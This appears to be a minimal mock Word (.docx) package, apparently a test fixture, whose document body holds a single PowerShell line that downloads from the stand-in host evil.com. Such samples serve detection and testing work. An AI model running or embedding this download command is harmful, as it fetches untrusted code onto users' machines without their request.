
<file path=[Content_Types].xml><?xml?><Types></Types>
</file>

<file path=word/document.xml>Invoke-WebRequest -Uri https://evil.com/download
</file>